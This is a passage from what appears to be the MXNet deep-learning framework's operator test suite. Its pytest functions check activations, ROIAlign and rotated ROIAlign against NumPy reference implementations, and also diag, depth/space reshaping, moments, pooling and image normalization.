lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test is run on both GPU and CPU hosts, so we cannot assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: on a CPU-only host, CUDA is sometimes unable to determine the number
# of GPUs.
if str(e).find("CUDA") == -1:
raise e
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
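# w1..w4 are the standard bilinear weights (hy*hx, hy*lx, ly*hx, ly*lx); they sum to 1
# and are reused below as the gradient contributions to the four neighbouring pixels.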
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
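# For position-sensitive ROI align each of the PH*PW output bins reads from its own
# group of input channels, so the number of output channels shrinks by a factor of PH*PW.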
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
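# Rotate the ROI-local offset (xx, yy) by the ROI angle and shift by the ROI centre
# to get the sampling location (x, y) in image coordinates.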
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
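# Reference DepthToSpace: split the channel axis into (blocksize, blocksize, C/block^2),
# move the two block factors next to H and W, then merge them to get
# (b, C/block^2, H*block, W*block).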
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
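# Reference SpaceToDepth: split H and W into (H/block, block) and (W/block, block),
# then move the two block factors into the channel axis, giving
# (b, C*block^2, H/block, W/block).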
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
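# Add mean and variance into a single output so that one symbolic forward and one
# numeric-gradient check exercise both outputs of moments at once.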
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
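# NOTE: chained [:] indexing returns the same view, so data_expected_3d[:][:][c] is just
# data_expected_3d[c], i.e. channel c of the (C, H, W) array; the per-channel mean/std
# above are therefore applied along the leading channel axis.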
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
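# Build the expected output: np.mgrid enumerates the index along each axis, and stacking
# on the last axis gives every element its full index vector, which is what index_array returns.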
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
